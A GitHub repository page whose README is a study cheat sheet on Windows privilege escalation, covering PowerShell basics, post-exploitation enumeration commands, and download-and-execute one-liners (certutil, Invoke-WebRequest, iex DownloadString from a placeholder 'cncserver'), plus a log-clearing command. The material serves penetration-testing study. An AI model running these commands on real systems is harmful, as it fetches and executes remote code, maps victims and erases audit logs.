Skip to content
/ WindowsPrivEsc Public

Repository on Windows Privilege Escalation, It contains helpful resources which can guide you escalating your privileges on Windows.

10 stars 2 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Vedant-Bhalgama/WindowsPrivEsc

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

14 Commits
README.md
README.md
 
 
Windows Privilege Escalation.pdf
Windows Privilege Escalation.pdf
 
 

Repository files navigation

WindowsPrivEsc

Repository on Windows Privilege Escalation, It contains helpful resources which can guide you escalating your privileges on Windows. I was noting all of the Privilege Escalation methods and vectors while I was studying it. Please go through it and you may find it helpful. Also, Small CheatSheets can be found here which can be important. Will keep updating it!

PowerShell Basic Commands:

Get-ChildItem (Displays all the contents in the current directory)

Get-Alias (Displays all the aliases)

Set-Alias (Setup your Alias)

$profile (Lists your powershell profile, for eg: "C:\Users\user\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1")

Import-Module ./PowerUp.ps1 (Imports a PowerShell Script Module)

Remove-Item (Delete any file or folder)

Import-Alias (Import aliases)

Download and Execute:

CertUtil:

certutil -urlcache -f http://127.0.0.1/sample.exe C:\temp\sample.exe && C:\temp\sample.exe

PowerShell:

Download file and save to disk :

Invoke-WebRequest "http://127.0.0.1/sample.exe" -OutFile "C:\temp\sample.exe"

Download and execute in memory :

iex (New-Object Net.WebClient).DownloadString('http://cncserver/samplescript.ps1')

Post exploitation enumeration:

  • whoami /all : Gain all information about the user on the machine.
  • whoami/groups : Gain information only about the groups the current user is present in.
  • whoami /priv : Gain information about the privileges of the user.
  • systeminfo : Display information about the system such as Kernel Version, Architecture, OS Version and so on.
  • driverquery : Display a list of all the installed drivers on victim machine
  • sc query <servicename> : Display information about a particular service.
  • tasklist : Obtain Information about running tasks
  • tasklist /m kernel32.dll : Obtain information about running tasks which are linked with a particular module
  • taskkill /f /pid <pid> : Kill a specified process ID
  • wevtutil el : List all logs on the system
  • wevtutil cl System : Clear all logs (Requires Admin Privileges)
  • wmic logicaldisk get Caption,Description : List all hard-drives on the system
  • sc query | findstr "SERVICE_NAME" : Display all service names

Socials

TwitterID: https://twitter.com/BhalgamaVedant

YouTube: https://www.youtube.com/channel/UCIlMtOiRDi1luvhtjczvjJw

About

Repository on Windows Privilege Escalation, It contains helpful resources which can guide you escalating your privileges on Windows.

Resources

Readme
Activity

Stars

10 stars

Watchers

1 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published